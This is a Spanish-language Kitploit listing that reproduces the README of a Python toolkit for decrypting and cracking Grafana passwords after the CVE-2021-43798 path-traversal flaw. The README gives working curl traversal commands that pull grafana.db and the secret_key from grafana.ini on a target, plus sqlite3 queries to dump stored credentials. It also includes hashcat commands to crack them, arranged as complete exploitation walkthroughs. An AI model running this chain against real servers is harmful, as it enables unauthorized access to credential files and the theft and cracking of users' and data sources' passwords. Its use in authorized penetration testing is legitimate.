Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Grafana-Password-Decryptor — Kit de herramientas en Python para descifrar AES-256 y crackear contraseñas PBKDF2 de bases de datos de Grafana, generalmente usado junto con (CVE-2021-43798) | Kitploit
Herramientas/GitHubGitHub/strikoder-premium/grafana-password-decryptor
Descifrado de ContraseñasHerramientas de Cifrado/DescifradoAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónCriptografía
GitHubstrikoder-premium/grafana-password-decryptor

Grafana-Password-Decryptor

Kit de herramientas en Python para descifrar AES-256 y crackear contraseñas PBKDF2 de bases de datos de Grafana, generalmente usado junto con (CVE-2021-43798)

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 8 mesesAún no revisado

Grafana Password Decryptor

Kit de herramientas en Python para descifrar y crackear contraseñas de Grafana en múltiples formatos.

Creado por: strikoder

¿Qué Hace Esta Herramienta?

Maneja dos tipos de almacenamiento de contraseñas de Grafana:

  • 🔐 AES-256 Base64 (tabla data_source) → Descifra directamente con AESDecrypt.py
  • 🔨 PBKDF2_HMAC_SHA256 (tabla user) → Convierte para Hashcat con grafana2hashcat.py

Perfecto para post-explotación después de CVE-2021-43798 (path traversal).

¿Qué es CVE-2021-43798?

Una vulnerabilidad de path traversal en las versiones de Grafana 8.0.0-beta1 hasta 8.3.0 que permite a atacantes no autenticados leer archivos arbitrarios del servidor, incluyendo:

  • Archivos de configuración (/etc/grafana/grafana.ini)
  • Archivos de base de datos (/var/lib/grafana/grafana.db)
  • Archivos del sistema (/etc/passwd)

Ejemplo de exploit:

root@kitploit:~
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is --output grafana.db

Este kit completa la cadena de ataque descifrando/crackeando las contraseñas que extraes de la base de datos.

Herramientas Incluidas

1. AESDecrypt.py

Descifra contraseñas cifradas con AES-256 de la tabla data_source.

Basado en: jas502n/Grafana-CVE-2021-43798 con mejoras clave:

  • ✅ Clave secreta flexible: Extrae la clave manualmente (sin rutas hardcodeadas)
  • ✅ Procesamiento por lotes: Descifra múltiples hashes desde un archivo
  • ✅ Totalmente configurable: Todos los parámetros mediante flags de CLI

2. grafana2hashcat.py

Convierte hashes PBKDF2_HMAC_SHA256 de Grafana de la tabla user al formato compatible con Hashcat para el cracking de contraseñas.

Crédito: iamaldi/grafana2hashcat

Instalación

root@kitploit:~
git clone https://github.com/strikoder/Grafana-Password-Decryptor.git
cd Grafana-Password-Decryptor
pip install cryptography #for Decyrption
chmod +x AESDecrypt.py grafana2hashcat.py

Uso

Herramienta 1: AESDecrypt.py (para contraseñas AES-256 Base64)

Descifrar un solo hash

root@kitploit:~
python3 AESDecrypt.py -hash R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

Descifrar múltiples hashes

root@kitploit:~
python3 AESDecrypt.py -f hashes.txt

Usar una clave secreta personalizada

Extrae la clave secreta de la configuración de Grafana:

root@kitploit:~
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' --path-as-is | grep secret_key

python3 AESDecrypt.py -hash [HASH] -k YOUR_SECRET_KEY

Herramienta 2: grafana2hashcat.py (para hashes PBKDF2)

Convertir un archivo de hashes

root@kitploit:~
python3 grafana2hashcat.py grafana_hashes.txt

Formato de entrada (grafana_hashes.txt):

root@kitploit:~
hash1,salt1
hash2,salt2
hash3,salt3

Salida (lista para Hashcat):

root@kitploit:~
sha256:10000:base64_salt:base64_hash

Guardar en un archivo

root@kitploit:~
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt

Crackear con Hashcat

root@kitploit:~
hashcat -m 10900 hashcat_hashes.txt wordlist.txt

Ejemplo Completo de Explotación

Escenario 1: Contraseñas Cifradas con AES (tabla data_source)

root@kitploit:~
# 1. Extrae la clave secreta de grafana.ini (podría estar vacía en algunos casos; en ese caso usa la clave por defecto del programa python)
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' \
  --path-as-is | grep secret_key

# 2. Descarga la base de datos
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db

# 3. Extrae las contraseñas cifradas con AES de la tabla data_source
sqlite3 grafana.db "SELECT name, password FROM data_source;"

# 4. Guarda las contraseñas en un archivo (una por línea)
# Ejemplo: R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

# 5. Descifra con la clave secreta extraída
python3 AESDecrypt.py -f passwords.txt -k [SECRET_KEY]

Escenario 2: Hashes PBKDF2 (tabla user)

root@kitploit:~
# 0. Descarga la base de datos
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db

# 1. Extrae los hashes de contraseña PBKDF2 de la tabla user
sqlite3 grafana.db "SELECT login, password, salt FROM user;"

# 2. Formatea los hashes para grafana2hashcat (formato hash,salt)
# Ejemplo de formato en grafana_hashes.txt:
# 3ad31dc57a7452c442f259cfff7aa61f2a6cea88ee634724ae146e221ae4e01c56c8bcbb3552310acd2fd746a396d2f99bf8,pepper

# 3. Convierte al formato de Hashcat
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt

# 4. Crackea con Hashcat (modo 10900 = PBKDF2-HMAC-SHA256)
hashcat -m 10900 hashcat_hashes.txt rockyou.txt

Referencia Rápida: ¿Qué Herramienta Usar?

Créditos

  • AESDecrypt.py: Creado por strikoder, basado en la implementación en Go de jas502n
  • grafana2hashcat.py: Creado por iamaldi

⭐ ¿Te resultó útil? ¡Dale una estrella!

Creado por strikoder

Descargar herramienta
Tipo de ContraseñaTabla de la BDFormatoHerramientaModo Hashcat
Cifrada con AES-256data_sourceCadena Base64AESDecrypt.pyN/D (descifrado directo)
PBKDF2_HMAC_SHA256userHash hex + saltgrafana2hashcat.py-m 10900